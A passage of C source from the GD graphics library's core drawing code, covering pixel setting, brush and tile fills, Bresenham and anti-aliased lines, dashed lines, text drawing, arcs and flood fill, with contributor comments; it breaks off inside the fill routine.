if (im->transparent != -1) {
im->alpha[im->transparent] = gdAlphaOpaque;
}
if (color > -1 && color < im->colorsTotal && color < gdMaxColors) {
im->alpha[color] = gdAlphaTransparent;
} else {
return;
}
}
im->transparent = color;
}
void gdImagePaletteCopy (gdImagePtr to, gdImagePtr from)
{
int i;
int x, y, p;
int xlate[256];
if (to->trueColor || from->trueColor) {
return;
}
for (i = 0; i < 256; i++) {
xlate[i] = -1;
}
for (y = 0; y < to->sy; y++) {
for (x = 0; x < to->sx; x++) {
p = gdImageGetPixel(to, x, y);
if (xlate[p] == -1) {
/* This ought to use HWB, but we don't have an alpha-aware version of that yet. */
xlate[p] = gdImageColorClosestAlpha (from, to->red[p], to->green[p], to->blue[p], to->alpha[p]);
}
gdImageSetPixel(to, x, y, xlate[p]);
}
}
for (i = 0; i < from->colorsTotal; i++) {
to->red[i] = from->red[i];
to->blue[i] = from->blue[i];
to->green[i] = from->green[i];
to->alpha[i] = from->alpha[i];
to->open[i] = 0;
}
for (i = from->colorsTotal; i < to->colorsTotal; i++) {
to->open[i] = 1;
}
to->colorsTotal = from->colorsTotal;
}
/* 2.0.10: before the drawing routines, some code to clip points that are
* outside the drawing window. Nick Atty (nick@canalplan.org.uk)
*
* This is the Sutherland Hodgman Algorithm, as implemented by
* Duvanenko, Robbins and Gyurcsik - SH(DRG) for short. See Dr Dobb's
* Journal, January 1996, pp107-110 and 116-117
*
* Given the end points of a line, and a bounding rectangle (which we
* know to be from (0,0) to (SX,SY)), adjust the endpoints to be on
* the edges of the rectangle if the line should be drawn at all,
* otherwise return a failure code
*/
/* this does "one-dimensional" clipping: note that the second time it
* is called, all the x parameters refer to height and the y to width
* - the comments ignore this (if you can understand it when it's
* looking at the X parameters, it should become clear what happens on
* the second call!) The code is simplified from that in the article,
* as we know that gd images always start at (0,0)
*/
static int clip_1d(int *x0, int *y0, int *x1, int *y1, int maxdim) {
double m; /* gradient of line */
if (*x0 < 0) { /* start of line is left of window */
if(*x1 < 0) { /* as is the end, so the line never cuts the window */
return 0;
}
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
/* adjust x0 to be on the left boundary (ie to be zero), and y0 to match */
*y0 -= (int)(m * *x0);
*x0 = 0;
/* now, perhaps, adjust the far end of the line as well */
if (*x1 > maxdim) {
*y1 += (int)(m * (maxdim - *x1));
*x1 = maxdim;
}
return 1;
}
if (*x0 > maxdim) { /* start of line is right of window - complement of above */
if (*x1 > maxdim) { /* as is the end, so the line misses the window */
return 0;
}
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y0 += (int)(m * (maxdim - *x0)); /* adjust so point is on the right boundary */
*x0 = maxdim;
/* now, perhaps, adjust the end of the line */
if (*x1 < 0) {
*y1 -= (int)(m * *x1);
*x1 = 0;
}
return 1;
}
/* the final case - the start of the line is inside the window */
if (*x1 > maxdim) { /* other end is outside to the right */
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y1 += (int)(m * (maxdim - *x1));
*x1 = maxdim;
return 1;
}
if (*x1 < 0) { /* other end is outside to the left */
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y1 -= (int)(m * *x1);
*x1 = 0;
return 1;
}
/* only get here if both points are inside the window */
return 1;
}
void gdImageSetPixel (gdImagePtr im, int x, int y, int color)
{
int p;
switch (color) {
case gdStyled:
if (!im->style) {
/* Refuse to draw if no style is set. */
return;
} else {
p = im->style[im->stylePos++];
}
if (p != gdTransparent) {
gdImageSetPixel(im, x, y, p);
}
im->stylePos = im->stylePos % im->styleLength;
break;
case gdStyledBrushed:
if (!im->style) {
/* Refuse to draw if no style is set. */
return;
}
p = im->style[im->stylePos++];
if (p != gdTransparent && p != 0) {
gdImageSetPixel(im, x, y, gdBrushed);
}
im->stylePos = im->stylePos % im->styleLength;
break;
case gdBrushed:
gdImageBrushApply(im, x, y);
break;
case gdTiled:
gdImageTileApply(im, x, y);
break;
case gdAntiAliased:
gdImageAntiAliasedApply(im, x, y);
break;
default:
if (gdImageBoundsSafe(im, x, y)) {
if (im->trueColor) {
switch (im->alphaBlendingFlag) {
default:
case gdEffectReplace:
im->tpixels[y][x] = color;
break;
case gdEffectAlphaBlend:
im->tpixels[y][x] = gdAlphaBlend(im->tpixels[y][x], color);
break;
case gdEffectNormal:
im->tpixels[y][x] = gdAlphaBlend(im->tpixels[y][x], color);
break;
case gdEffectOverlay :
im->tpixels[y][x] = gdLayerOverlay(im->tpixels[y][x], color);
break;
}
} else {
im->pixels[y][x] = color;
}
}
break;
}
}
int gdImageGetTrueColorPixel (gdImagePtr im, int x, int y)
{
int p = gdImageGetPixel(im, x, y);
if (!im->trueColor) {
return gdTrueColorAlpha(im->red[p], im->green[p], im->blue[p], (im->transparent == p) ? gdAlphaTransparent : im->alpha[p]);
} else {
return p;
}
}
static void gdImageBrushApply (gdImagePtr im, int x, int y)
{
int lx, ly;
int hy, hx;
int x1, y1, x2, y2;
int srcx, srcy;
if (!im->brush) {
return;
}
hy = gdImageSY(im->brush) / 2;
y1 = y - hy;
y2 = y1 + gdImageSY(im->brush);
hx = gdImageSX(im->brush) / 2;
x1 = x - hx;
x2 = x1 + gdImageSX(im->brush);
srcy = 0;
if (im->trueColor) {
if (im->brush->trueColor) {
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; (lx < x2); lx++) {
int p;
p = gdImageGetTrueColorPixel(im->brush, srcx, srcy);
/* 2.0.9, Thomas Winzig: apply simple full transparency */
if (p != gdImageGetTransparent(im->brush)) {
gdImageSetPixel(im, lx, ly, p);
}
srcx++;
}
srcy++;
}
} else {
/* 2.0.12: Brush palette, image truecolor (thanks to Thorben Kundinger for pointing out the issue) */
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; lx < x2; lx++) {
int p, tc;
p = gdImageGetPixel(im->brush, srcx, srcy);
tc = gdImageGetTrueColorPixel(im->brush, srcx, srcy);
/* 2.0.9, Thomas Winzig: apply simple full transparency */
if (p != gdImageGetTransparent(im->brush)) {
gdImageSetPixel(im, lx, ly, tc);
}
srcx++;
}
srcy++;
}
}
} else {
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; lx < x2; lx++) {
int p;
p = gdImageGetPixel(im->brush, srcx, srcy);
/* Allow for non-square brushes! */
if (p != gdImageGetTransparent(im->brush)) {
/* Truecolor brush. Very slow on a palette destination. */
if (im->brush->trueColor) {
gdImageSetPixel(im, lx, ly, gdImageColorResolveAlpha(im, gdTrueColorGetRed(p),
gdTrueColorGetGreen(p),
gdTrueColorGetBlue(p),
gdTrueColorGetAlpha(p)));
} else {
gdImageSetPixel(im, lx, ly, im->brushColorMap[p]);
}
}
srcx++;
}
srcy++;
}
}
}
static void gdImageTileApply (gdImagePtr im, int x, int y)
{
gdImagePtr tile = im->tile;
int srcx, srcy;
int p;
if (!tile) {
return;
}
srcx = x % gdImageSX(tile);
srcy = y % gdImageSY(tile);
if (im->trueColor) {
p = gdImageGetPixel(tile, srcx, srcy);
if (p != gdImageGetTransparent (tile)) {
if (!tile->trueColor) {
p = gdTrueColorAlpha(tile->red[p], tile->green[p], tile->blue[p], tile->alpha[p]);
}
gdImageSetPixel(im, x, y, p);
}
} else {
p = gdImageGetPixel(tile, srcx, srcy);
/* Allow for transparency */
if (p != gdImageGetTransparent(tile)) {
if (tile->trueColor) {
/* Truecolor tile. Very slow on a palette destination. */
gdImageSetPixel(im, x, y, gdImageColorResolveAlpha(im,
gdTrueColorGetRed(p),
gdTrueColorGetGreen(p),
gdTrueColorGetBlue(p),
gdTrueColorGetAlpha(p)));
} else {
gdImageSetPixel(im, x, y, im->tileColorMap[p]);
}
}
}
}
static int gdImageTileGet (gdImagePtr im, int x, int y)
{
int srcx, srcy;
int tileColor,p;
if (!im->tile) {
return -1;
}
srcx = x % gdImageSX(im->tile);
srcy = y % gdImageSY(im->tile);
p = gdImageGetPixel(im->tile, srcx, srcy);
if (im->trueColor) {
if (im->tile->trueColor) {
tileColor = p;
} else {
tileColor = gdTrueColorAlpha( gdImageRed(im->tile,p), gdImageGreen(im->tile,p), gdImageBlue (im->tile,p), gdImageAlpha (im->tile,p));
}
} else {
if (im->tile->trueColor) {
tileColor = gdImageColorResolveAlpha(im, gdTrueColorGetRed (p), gdTrueColorGetGreen (p), gdTrueColorGetBlue (p), gdTrueColorGetAlpha (p));
} else {
tileColor = p;
tileColor = gdImageColorResolveAlpha(im, gdImageRed (im->tile,p), gdImageGreen (im->tile,p), gdImageBlue (im->tile,p), gdImageAlpha (im->tile,p));
}
}
return tileColor;
}
static void gdImageAntiAliasedApply (gdImagePtr im, int px, int py)
{
float p_dist, p_alpha;
unsigned char opacity;
/*
* Find the perpendicular distance from point C (px, py) to the line
* segment AB that is being drawn. (Adapted from an algorithm from the
* comp.graphics.algorithms FAQ.)
*/
int LAC_2, LBC_2;
int Ax_Cx = im->AAL_x1 - px;
int Ay_Cy = im->AAL_y1 - py;
int Bx_Cx = im->AAL_x2 - px;
int By_Cy = im->AAL_y2 - py;
/* 2.0.13: bounds check! AA_opacity is just as capable of
* overflowing as the main pixel array. Arne Jorgensen.
* 2.0.14: typo fixed. 2.0.15: moved down below declarations
* to satisfy non-C++ compilers.
*/
if (!gdImageBoundsSafe(im, px, py)) {
return;
}
/* Get the squares of the lengths of the segemnts AC and BC. */
LAC_2 = (Ax_Cx * Ax_Cx) + (Ay_Cy * Ay_Cy);
LBC_2 = (Bx_Cx * Bx_Cx) + (By_Cy * By_Cy);
if (((im->AAL_LAB_2 + LAC_2) >= LBC_2) && ((im->AAL_LAB_2 + LBC_2) >= LAC_2)) {
/* The two angles are acute. The point lies inside the portion of the
* plane spanned by the line segment.
*/
p_dist = fabs ((float) ((Ay_Cy * im->AAL_Bx_Ax) - (Ax_Cx * im->AAL_By_Ay)) / im->AAL_LAB);
} else {
/* The point is past an end of the line segment. It's length from the
* segment is the shorter of the lengths from the endpoints, but call
* the distance -1, so as not to compute the alpha nor draw the pixel.
*/
p_dist = -1;
}
if ((p_dist >= 0) && (p_dist <= (float) (im->thick))) {
p_alpha = pow (1.0 - (p_dist / 1.5), 2);
if (p_alpha > 0) {
if (p_alpha >= 1) {
opacity = 255;
} else {
opacity = (unsigned char) (p_alpha * 255.0);
}
if (!im->AA_polygon || (im->AA_opacity[py][px] < opacity)) {
im->AA_opacity[py][px] = opacity;
}
}
}
}
int gdImageGetPixel (gdImagePtr im, int x, int y)
{
if (gdImageBoundsSafe(im, x, y)) {
if (im->trueColor) {
return im->tpixels[y][x];
} else {
return im->pixels[y][x];
}
} else {
return 0;
}
}
void gdImageAABlend (gdImagePtr im)
{
float p_alpha, old_alpha;
int color = im->AA_color, color_red, color_green, color_blue;
int old_color, old_red, old_green, old_blue;
int p_color, p_red, p_green, p_blue;
int px, py;
color_red = gdImageRed(im, color);
color_green = gdImageGreen(im, color);
color_blue = gdImageBlue(im, color);
/* Impose the anti-aliased drawing on the image. */
for (py = 0; py < im->sy; py++) {
for (px = 0; px < im->sx; px++) {
if (im->AA_opacity[py][px] != 0) {
old_color = gdImageGetPixel(im, px, py);
if ((old_color != color) && ((old_color != im->AA_dont_blend) || (im->AA_opacity[py][px] == 255))) {
/* Only blend with different colors that aren't the dont_blend color. */
p_alpha = (float) (im->AA_opacity[py][px]) / 255.0;
old_alpha = 1.0 - p_alpha;
if (p_alpha >= 1.0) {
p_color = color;
} else {
old_red = gdImageRed(im, old_color);
old_green = gdImageGreen(im, old_color);
old_blue = gdImageBlue(im, old_color);
p_red = (int) (((float) color_red * p_alpha) + ((float) old_red * old_alpha));
p_green = (int) (((float) color_green * p_alpha) + ((float) old_green * old_alpha));
p_blue = (int) (((float) color_blue * p_alpha) + ((float) old_blue * old_alpha));
p_color = gdImageColorResolve(im, p_red, p_green, p_blue);
}
gdImageSetPixel(im, px, py, p_color);
}
}
}
/* Clear the AA_opacity array behind us. */
memset(im->AA_opacity[py], 0, im->sx);
}
}
static void gdImageHLine(gdImagePtr im, int y, int x1, int x2, int col)
{
if (im->thick > 1) {
int thickhalf = im->thick >> 1;
gdImageFilledRectangle(im, x1, y - thickhalf, x2, y + im->thick - thickhalf - 1, col);
} else {
if (x2 < x1) {
int t = x2;
x2 = x1;
x1 = t;
}
for (;x1 <= x2; x1++) {
gdImageSetPixel(im, x1, y, col);
}
}
return;
}
static void gdImageVLine(gdImagePtr im, int x, int y1, int y2, int col)
{
if (im->thick > 1) {
int thickhalf = im->thick >> 1;
gdImageFilledRectangle(im, x - thickhalf, y1, x + im->thick - thickhalf - 1, y2, col);
} else {
if (y2 < y1) {
int t = y1;
y1 = y2;
y2 = t;
}
for (;y1 <= y2; y1++) {
gdImageSetPixel(im, x, y1, col);
}
}
return;
}
/* Bresenham as presented in Foley & Van Dam */
void gdImageLine (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int dx, dy, incr1, incr2, d, x, y, xend, yend, xdirflag, ydirflag;
int wid;
int w, wstart;
int thick = im->thick;
if (color == gdAntiAliased) {
/*
gdAntiAliased passed as color: use the much faster, much cheaper
and equally attractive gdImageAALine implementation. That
clips too, so don't clip twice.
*/
gdImageAALine(im, x1, y1, x2, y2, im->AA_color);
return;
}
/* 2.0.10: Nick Atty: clip to edges of drawing rectangle, return if no points need to be drawn */
if (!clip_1d(&x1,&y1,&x2,&y2,gdImageSX(im)) || !clip_1d(&y1,&x1,&y2,&x2,gdImageSY(im))) {
return;
}
dx = abs (x2 - x1);
dy = abs (y2 - y1);
if (dx == 0) {
gdImageVLine(im, x1, y1, y2, color);
return;
} else if (dy == 0) {
gdImageHLine(im, y1, x1, x2, color);
return;
}
if (dy <= dx) {
/* More-or-less horizontal. use wid for vertical stroke */
/* Doug Claar: watch out for NaN in atan2 (2.0.5) */
if ((dx == 0) && (dy == 0)) {
wid = 1;
} else {
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double ac = cos (atan2 (dy, dx));
if (ac != 0) {
wid = thick / ac;
} else {
wid = 1;
}
if (wid == 0) {
wid = 1;
}
}
d = 2 * dy - dx;
incr1 = 2 * dy;
incr2 = 2 * (dy - dx);
if (x1 > x2) {
x = x2;
y = y2;
ydirflag = (-1);
xend = x1;
} else {
x = x1;
y = y1;
ydirflag = 1;
xend = x2;
}
/* Set up line thickness */
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, x, w, color);
}
if (((y2 - y1) * ydirflag) > 0) {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y++;
d += incr2;
}
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, x, w, color);
}
}
} else {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y--;
d += incr2;
}
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, x, w, color);
}
}
}
} else {
/* More-or-less vertical. use wid for horizontal stroke */
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin (atan2 (dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
if (wid == 0) {
wid = 1;
}
d = 2 * dx - dy;
incr1 = 2 * dx;
incr2 = 2 * (dx - dy);
if (y1 > y2) {
y = y2;
x = x2;
yend = y1;
xdirflag = (-1);
} else {
y = y1;
x = x1;
yend = y2;
xdirflag = 1;
}
/* Set up line thickness */
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
if (((x2 - x1) * xdirflag) > 0) {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x++;
d += incr2;
}
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
}
} else {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x--;
d += incr2;
}
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
}
}
}
}
/*
* Added on 2003/12 by Pierre-Alain Joye (pajoye@pearfr.org)
* */
#define BLEND_COLOR(a, nc, c, cc) \
nc = (cc) + (((((c) - (cc)) * (a)) + ((((c) - (cc)) * (a)) >> 8) + 0x80) >> 8);
inline static void gdImageSetAAPixelColor(gdImagePtr im, int x, int y, int color, int t)
{
int dr,dg,db,p,r,g,b;
dr = gdTrueColorGetRed(color);
dg = gdTrueColorGetGreen(color);
db = gdTrueColorGetBlue(color);
p = gdImageGetPixel(im,x,y);
r = gdTrueColorGetRed(p);
g = gdTrueColorGetGreen(p);
b = gdTrueColorGetBlue(p);
BLEND_COLOR(t, dr, r, dr);
BLEND_COLOR(t, dg, g, dg);
BLEND_COLOR(t, db, b, db);
im->tpixels[y][x]=gdTrueColorAlpha(dr, dg, db, gdAlphaOpaque);
}
/*
* Added on 2003/12 by Pierre-Alain Joye (pajoye@pearfr.org)
**/
void gdImageAALine (gdImagePtr im, int x1, int y1, int x2, int y2, int col)
{
/* keep them as 32bits */
long x, y, inc;
long dx, dy,tmp;
if (y1 < 0 && y2 < 0) {
return;
}
if (y1 < 0) {
x1 += (y1 * (x1 - x2)) / (y2 - y1);
y1 = 0;
}
if (y2 < 0) {
x2 += (y2 * (x1 - x2)) / (y2 - y1);
y2 = 0;
}
/* bottom edge */
if (y1 >= im->sy && y2 >= im->sy) {
return;
}
if (y1 >= im->sy) {
x1 -= ((im->sy - y1) * (x1 - x2)) / (y2 - y1);
y1 = im->sy - 1;
}
if (y2 >= im->sy) {
x2 -= ((im->sy - y2) * (x1 - x2)) / (y2 - y1);
y2 = im->sy - 1;
}
/* left edge */
if (x1 < 0 && x2 < 0) {
return;
}
if (x1 < 0) {
y1 += (x1 * (y1 - y2)) / (x2 - x1);
x1 = 0;
}
if (x2 < 0) {
y2 += (x2 * (y1 - y2)) / (x2 - x1);
x2 = 0;
}
/* right edge */
if (x1 >= im->sx && x2 >= im->sx) {
return;
}
if (x1 >= im->sx) {
y1 -= ((im->sx - x1) * (y1 - y2)) / (x2 - x1);
x1 = im->sx - 1;
}
if (x2 >= im->sx) {
y2 -= ((im->sx - x2) * (y1 - y2)) / (x2 - x1);
x2 = im->sx - 1;
}
dx = x2 - x1;
dy = y2 - y1;
if (dx == 0 && dy == 0) {
return;
}
if (abs(dx) > abs(dy)) {
if (dx < 0) {
tmp = x1;
x1 = x2;
x2 = tmp;
tmp = y1;
y1 = y2;
y2 = tmp;
dx = x2 - x1;
dy = y2 - y1;
}
x = x1 << 16;
y = y1 << 16;
inc = (dy * 65536) / dx;
while ((x >> 16) <= x2) {
gdImageSetAAPixelColor(im, x >> 16, y >> 16, col, (y >> 8) & 0xFF);
if ((y >> 16) + 1 < im->sy) {
gdImageSetAAPixelColor(im, x >> 16, (y >> 16) + 1,col, (~y >> 8) & 0xFF);
}
x += (1 << 16);
y += inc;
}
} else {
if (dy < 0) {
tmp = x1;
x1 = x2;
x2 = tmp;
tmp = y1;
y1 = y2;
y2 = tmp;
dx = x2 - x1;
dy = y2 - y1;
}
x = x1 << 16;
y = y1 << 16;
inc = (dx * 65536) / dy;
while ((y>>16) <= y2) {
gdImageSetAAPixelColor(im, x >> 16, y >> 16, col, (x >> 8) & 0xFF);
if ((x >> 16) + 1 < im->sx) {
gdImageSetAAPixelColor(im, (x >> 16) + 1, (y >> 16),col, (~x >> 8) & 0xFF);
}
x += inc;
y += (1<<16);
}
}
}
static void dashedSet (gdImagePtr im, int x, int y, int color, int *onP, int *dashStepP, int wid, int vert);
void gdImageDashedLine (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int dx, dy, incr1, incr2, d, x, y, xend, yend, xdirflag, ydirflag;
int dashStep = 0;
int on = 1;
int wid;
int vert;
int thick = im->thick;
dx = abs(x2 - x1);
dy = abs(y2 - y1);
if (dy <= dx) {
/* More-or-less horizontal. use wid for vertical stroke */
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin(atan2(dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
wid = (int)(thick * sin(atan2(dy, dx)));
vert = 1;
d = 2 * dy - dx;
incr1 = 2 * dy;
incr2 = 2 * (dy - dx);
if (x1 > x2) {
x = x2;
y = y2;
ydirflag = (-1);
xend = x1;
} else {
x = x1;
y = y1;
ydirflag = 1;
xend = x2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
if (((y2 - y1) * ydirflag) > 0) {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y++;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
} else {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y--;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
}
} else {
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin (atan2 (dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
vert = 0;
d = 2 * dx - dy;
incr1 = 2 * dx;
incr2 = 2 * (dx - dy);
if (y1 > y2) {
y = y2;
x = x2;
yend = y1;
xdirflag = (-1);
} else {
y = y1;
x = x1;
yend = y2;
xdirflag = 1;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
if (((x2 - x1) * xdirflag) > 0) {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x++;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
} else {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x--;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
}
}
}
static void dashedSet (gdImagePtr im, int x, int y, int color, int *onP, int *dashStepP, int wid, int vert)
{
int dashStep = *dashStepP;
int on = *onP;
int w, wstart;
dashStep++;
if (dashStep == gdDashSize) {
dashStep = 0;
on = !on;
}
if (on) {
if (vert) {
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, x, w, color);
}
} else {
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, w, y, color);
}
}
}
*dashStepP = dashStep;
*onP = on;
}
void gdImageChar (gdImagePtr im, gdFontPtr f, int x, int y, int c, int color)
{
int cx, cy;
int px, py;
int fline;
cx = 0;
cy = 0;
#ifdef CHARSET_EBCDIC
c = ASC (c);
#endif /*CHARSET_EBCDIC */
if ((c < f->offset) || (c >= (f->offset + f->nchars))) {
return;
}
fline = (c - f->offset) * f->h * f->w;
for (py = y; (py < (y + f->h)); py++) {
for (px = x; (px < (x + f->w)); px++) {
if (f->data[fline + cy * f->w + cx]) {
gdImageSetPixel(im, px, py, color);
}
cx++;
}
cx = 0;
cy++;
}
}
void gdImageCharUp (gdImagePtr im, gdFontPtr f, int x, int y, int c, int color)
{
int cx, cy;
int px, py;
int fline;
cx = 0;
cy = 0;
#ifdef CHARSET_EBCDIC
c = ASC (c);
#endif /*CHARSET_EBCDIC */
if ((c < f->offset) || (c >= (f->offset + f->nchars))) {
return;
}
fline = (c - f->offset) * f->h * f->w;
for (py = y; py > (y - f->w); py--) {
for (px = x; px < (x + f->h); px++) {
if (f->data[fline + cy * f->w + cx]) {
gdImageSetPixel(im, px, py, color);
}
cy++;
}
cy = 0;
cx++;
}
}
void gdImageString (gdImagePtr im, gdFontPtr f, int x, int y, unsigned char *s, int color)
{
int i;
int l;
l = strlen ((char *) s);
for (i = 0; (i < l); i++) {
gdImageChar(im, f, x, y, s[i], color);
x += f->w;
}
}
void gdImageStringUp (gdImagePtr im, gdFontPtr f, int x, int y, unsigned char *s, int color)
{
int i;
int l;
l = strlen ((char *) s);
for (i = 0; (i < l); i++) {
gdImageCharUp(im, f, x, y, s[i], color);
y -= f->w;
}
}
static int strlen16 (unsigned short *s);
void gdImageString16 (gdImagePtr im, gdFontPtr f, int x, int y, unsigned short *s, int color)
{
int i;
int l;
l = strlen16(s);
for (i = 0; (i < l); i++) {
gdImageChar(im, f, x, y, s[i], color);
x += f->w;
}
}
void gdImageStringUp16 (gdImagePtr im, gdFontPtr f, int x, int y, unsigned short *s, int color)
{
int i;
int l;
l = strlen16(s);
for (i = 0; i < l; i++) {
gdImageCharUp(im, f, x, y, s[i], color);
y -= f->w;
}
}
static int strlen16 (unsigned short *s)
{
int len = 0;
while (*s) {
s++;
len++;
}
return len;
}
#ifndef HAVE_LSQRT
/* If you don't have a nice square root function for longs, you can use
** this hack
*/
long lsqrt (long n)
{
long result = (long) sqrt ((double) n);
return result;
}
#endif
/* s and e are integers modulo 360 (degrees), with 0 degrees
being the rightmost extreme and degrees changing clockwise.
cx and cy are the center in pixels; w and h are the horizontal
and vertical diameter in pixels. Nice interface, but slow.
See gd_arc_f_buggy.c for a better version that doesn't
seem to be bug-free yet. */
void gdImageArc (gdImagePtr im, int cx, int cy, int w, int h, int s, int e, int color)
{
if ((s % 360) == (e % 360)) {
gdImageEllipse(im, cx, cy, w, h, color);
} else {
gdImageFilledArc(im, cx, cy, w, h, s, e, color, gdNoFill);
}
}
void gdImageFilledArc (gdImagePtr im, int cx, int cy, int w, int h, int s, int e, int color, int style)
{
gdPoint pts[3];
int i;
int lx = 0, ly = 0;
int fx = 0, fy = 0;
if ((s % 360) == (e % 360)) {
s = 0; e = 360;
} else {
if (s > 360) {
s = s % 360;
}
if (e > 360) {
e = e % 360;
}
while (s < 0) {
s += 360;
}
while (e < s) {
e += 360;
}
if (s == e) {
s = 0; e = 360;
}
}
for (i = s; i <= e; i++) {
int x, y;
x = ((long) gdCosT[i % 360] * (long) w / (2 * 1024)) + cx;
y = ((long) gdSinT[i % 360] * (long) h / (2 * 1024)) + cy;
if (i != s) {
if (!(style & gdChord)) {
if (style & gdNoFill) {
gdImageLine(im, lx, ly, x, y, color);
} else {
/* This is expensive! */
pts[0].x = lx;
pts[0].y = ly;
pts[1].x = x;
pts[1].y = y;
pts[2].x = cx;
pts[2].y = cy;
gdImageFilledPolygon(im, pts, 3, color);
}
}
} else {
fx = x;
fy = y;
}
lx = x;
ly = y;
}
if (style & gdChord) {
if (style & gdNoFill) {
if (style & gdEdged) {
gdImageLine(im, cx, cy, lx, ly, color);
gdImageLine(im, cx, cy, fx, fy, color);
}
gdImageLine(im, fx, fy, lx, ly, color);
} else {
pts[0].x = fx;
pts[0].y = fy;
pts[1].x = lx;
pts[1].y = ly;
pts[2].x = cx;
pts[2].y = cy;
gdImageFilledPolygon(im, pts, 3, color);
}
} else {
if (style & gdNoFill) {
if (style & gdEdged) {
gdImageLine(im, cx, cy, lx, ly, color);
gdImageLine(im, cx, cy, fx, fy, color);
}
}
}
}
void gdImageFillToBorder (gdImagePtr im, int x, int y, int border, int color)
{
int lastBorder;
/* Seek left */
int leftLimit = -1, rightLimit;
int i, restoreAlphaBlending = 0;
if (border < 0) {
/* Refuse to fill to a non-solid border */
return;
}
restoreAlphaBlending = im->alphaBlendingFlag;
im->alphaBlendingFlag = 0;
if (x >= im->sx) {
x = im->sx - 1;
} else if (x < 0) {
x = 0;
}
if (y >= im->sy) {
y = im->sy - 1;
} else if (y < 0) {
y = 0;
}
for (i = x; i >= 0; i--) {
if (gdImageGetPixel(im, i, y) == border) {
break;
}
gdImageSetPixel(im, i, y, color);
leftLimit = i;
}
if (leftLimit == -1) {
im->alphaBlendingFlag = restoreAlphaBlending;
return;
}
/* Seek right */
rightLimit = x;
for (i = (x + 1); i < im->sx; i++) {
if (gdImageGetPixel(im, i, y) == border) {
break;
}
gdImageSetPixel(im, i, y, color);
rightLimit = i;
}
/* Look at lines above and below and start paints */
/* Above */
if (y > 0) {
lastBorder = 1;
for (i = leftLimit; i <= rightLimit; i++) {
int c = gdImageGetPixel(im, i, y - 1);
if (lastBorder) {
if ((c != border) && (c != color)) {
gdImageFillToBorder(im, i, y - 1, border, color);
lastBorder = 0;
}
} else if ((c == border) || (c == color)) {
lastBorder = 1;
}
}
}
/* Below */
if (y < ((im->sy) - 1)) {
lastBorder = 1;
for (i = leftLimit; i <= rightLimit; i++) {
int c = gdImageGetPixel(im, i, y + 1);
if (lastBorder) {
if ((c != border) && (c != color)) {
gdImageFillToBorder(im, i, y + 1, border, color);
lastBorder = 0;
}
} else if ((c == border) || (c == color)) {
lastBorder = 1;
}
}
}
im->alphaBlendingFlag = restoreAlphaBlending;
}
/*
* set the pixel at (x,y) and its 4-connected neighbors
* with the same pixel value to the new pixel value nc (new color).
* A 4-connected neighbor: pixel above, below, left, or right of a pixel.
* ideas from comp.graphics discussions.
* For tiled fill, the use of a flag buffer is mandatory. As the tile image can
* contain the same color as the color to fill. To do not bloat normal filling
* code I added a 2nd private function.
*/
/* horizontal segment of scan line y */
struct seg {int y, xl, xr, dy;};
/* max depth of stack */
#define FILL_MAX ((int)(im->sy*im->sx)/4)
#define FILL_PUSH(Y, XL, XR, DY) \
if (sp<stack+FILL_MAX && Y+(DY)>=0 && Y+(DY)<wy2) \
{sp->y = Y; sp->xl = XL; sp->xr = XR; sp->dy = DY; sp++;}
#define FILL_POP(Y, XL, XR, DY) \
{sp--; Y = sp->y+(DY = sp->dy); XL = sp->xl; XR = sp->xr;}
static void _gdImageFillTiled(gdImagePtr im, int x, int y, int nc);
void gdImageFill(gdImagePtr im, int x, int y, int nc)
{
int l, x1, x2, dy;
int oc; /* old pixel value */
int wx2,wy2;
int alphablending_bak;
/* stack of filled segments */
/* struct seg stack[FILL_MAX],*sp = stack;; */
struct seg *stack = NULL;
struct seg *sp;
if (!im->trueColor && nc > (im->colorsTotal -1)) {
return;
}
alphablending_bak = im->alphaBlendingFlag;
im->alphaBlendingFlag = 0;
